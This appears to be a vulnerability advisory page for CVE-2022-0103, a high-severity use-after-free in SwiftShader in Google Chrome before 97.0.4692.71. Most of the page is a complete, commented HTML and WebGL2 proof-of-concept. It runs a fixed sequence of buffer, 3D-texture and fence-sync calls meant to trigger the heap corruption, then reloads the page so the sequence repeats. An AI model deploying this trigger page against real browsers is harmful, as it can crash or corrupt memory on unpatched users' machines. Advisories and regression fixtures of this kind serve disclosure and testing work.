CVE-2022-0103
HIGH Severity
Use after free in SwiftShader in Google Chrome prior to 97.0.4692.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Proof of Concept
<!DOCTYPE html>
<body>
<script>
(function () {
  'use strict';

  /**
   * Compile one shader stage from GLSL text.
   * Neither the compile status nor the info log is inspected here.
   * @param {WebGL2RenderingContext} gl - context that owns the shader
   * @param {string} source - GLSL source text
   * @param {number} type - gl.VERTEX_SHADER or gl.FRAGMENT_SHADER
   * @returns {WebGLShader} the shader object after compileShader()
   */
  const compileStage = (gl, source, type) => {
    const stage = gl.createShader(type);
    gl.shaderSource(stage, source);
    gl.compileShader(stage);
    return stage;
  };

  /**
   * Read GLSL source out of a <script> element by id and strip leading and
   * trailing whitespace.
   * @param {string} id - element id of the <script> holding the source
   * @returns {string} the trimmed source text
   */
  window.getShaderSource = function (id) {
    const raw = document.getElementById(id).textContent;
    return raw.replace(/^\s+|\s+$/g, '');
  };

  /**
   * Build, link and activate a program from a vertex and a fragment source.
   * Both stages are compiled before either is attached; deleteShader() is
   * called right after each attachShader(), so the program is the only thing
   * keeping the shader objects alive. Link status is not checked.
   * @param {WebGL2RenderingContext} gl - context to create the program on
   * @param {string} vertexShaderSource - GLSL for the vertex stage
   * @param {string} fragmentShaderSource - GLSL for the fragment stage
   * @returns {WebGLProgram} the program that useProgram() just activated
   */
  window.createProgram = function (gl, vertexShaderSource, fragmentShaderSource) {
    const program = gl.createProgram();
    const compiled = [
      compileStage(gl, vertexShaderSource, gl.VERTEX_SHADER),
      compileStage(gl, fragmentShaderSource, gl.FRAGMENT_SHADER),
    ];
    for (const stage of compiled) {
      gl.attachShader(program, stage);
      gl.deleteShader(stage);
    }
    gl.linkProgram(program);
    gl.useProgram(program);
    return program;
  };
})();
</script>
<canvas id="canvas1" width="512" height="512"></canvas>
<script id='2d-vertex-shader' type='x-shader/x-vertex'>#version 300 es
void main(){} // vertex stage with an empty body: gl_Position is never written
</script>
<script id='2d-fragment-shader' type='x-shader/x-fragment'>#version 300 es
precision mediump float;
// Single fragment output; every fragment is written as opaque white.
out vec4 color;
void main() {color = vec4(1,1,1,1);}
</script>
<script>
// Trigger sequence of the CVE-2022-0103 proof of concept: a fixed series of
// WebGL2 calls on one context. The call order is the fixture itself, so none of
// it should be reordered. Which call the SwiftShader use-after-free is tied to
// is not stated on this page. As a regression check, a fixed build (97.0.4692.71
// or later per the advisory) is expected to run this without a renderer crash.
// NOTE(review): this <script> is not strict mode, so `imgData` below becomes an
// implicit global, and `texture1` is re-declared with `var` three times (all
// three refer to the same binding).
async function genWebGL2(){
// `canvas` is declared but never used; the next line reaches the element through
// the named-access global `canvas1` (the element's id) instead.
var canvas = document.getElementById('canvas1');
var gl1 = canvas1.getContext('webgl2');
// Program built from the two shader <script> elements above, via the helpers
// defined in the first <script> block (no compile/link status checks).
var program1 = createProgram(gl1, getShaderSource('2d-vertex-shader'), getShaderSource('2d-fragment-shader'));
// Two buffers, one per binding point, each filled from a 4-element Uint16Array
// using the 5-argument WebGL2 bufferData form (srcOffset 0, length 0).
var buffer1 = gl1.createBuffer();
gl1.bindBuffer(gl1.ARRAY_BUFFER, buffer1);
var buffer89555 = gl1.createBuffer();
gl1.bindBuffer(gl1.ELEMENT_ARRAY_BUFFER, buffer89555);
gl1.bufferData( gl1.ELEMENT_ARRAY_BUFFER, new Uint16Array(4), gl1.STATIC_READ, 0, 0);
gl1.bufferData( gl1.ARRAY_BUFFER, new Uint16Array(4), gl1.STATIC_COPY, 0, 0);
// Indexed draw of 4 UNSIGNED_BYTE (1-byte) indices from the element buffer; no
// vertex attribute is enabled anywhere in this function.
gl1.drawElements(gl1.LINE_STRIP, 4, gl1.UNSIGNED_BYTE,0);
gl1.flush();
// 3D texture #1: 64x64x64 RGB8 upload from a 64*64*64*4-byte array (more than
// the 3 bytes per texel that RGB/UNSIGNED_BYTE consumes), then mipmap
// generation and a copyTexSubImage3D into level 0 from the read framebuffer
// (no framebuffer is bound in this function, so that is the canvas).
var texture1 = gl1.createTexture();
gl1.bindTexture(gl1.TEXTURE_3D, texture1);
imgData = new Uint8Array(64*64*64*4);
gl1.texImage3D(gl1.TEXTURE_3D, 0, gl1.RGB8, 64, 64, 64, 0, gl1.RGB, gl1.UNSIGNED_BYTE, imgData);
gl1.generateMipmap(gl1.TEXTURE_3D);
gl1.copyTexSubImage3D( gl1.TEXTURE_3D, 0, 0, 0, 0, 0, 0, 64, 64 );
// 3D texture #2: 256x256x256 RGBA8 (a 64 MiB upload). `texture1` now refers to
// the new object; the previous texture keeps no JS reference and is not deleted.
var texture1 = gl1.createTexture();
gl1.bindTexture(gl1.TEXTURE_3D, texture1);
imgData = new Uint8Array(256*256*256*4);
gl1.texImage3D(gl1.TEXTURE_3D, 0, gl1.RGBA8, 256, 256, 256, 0, gl1.RGBA, gl1.UNSIGNED_BYTE, imgData);
// Fence on the command stream, a non-blocking wait (timeout 0), and deletion of
// the sync object deferred by 10 ms. The function never awaits, so its promise
// settles before that timer fires.
var sync1 = gl1.fenceSync(gl1.SYNC_GPU_COMMANDS_COMPLETE, 0);
gl1.clientWaitSync(sync1, 0, 0);
setTimeout(function(){gl1.deleteSync(sync1);}, 10);
// A third texture object is created but never bound, so this texImage3D call
// targets whatever is still bound to TEXTURE_3D (texture #2 above).
var texture1 = gl1.createTexture();
gl1.texImage3D(gl1.TEXTURE_3D, 0, gl1.RGBA8, 256, 256, 256, 0, gl1.RGBA, gl1.UNSIGNED_BYTE, imgData);
}
// Run the sequence once, then reload the document so the page's scripts (and
// with them genWebGL2) execute again from a fresh state. genWebGL2 contains no
// await, so the reload is scheduled as soon as its body has finished.
genWebGL2().then(function () {
  location.reload();
});
</script>
</body>
</html>
Risk Information
CVE ID
CVE-2022-0103
Vendor
Google
Product
Chrome
CVSS SCORE
8.8
Advisories
Vendor Advisory
NVD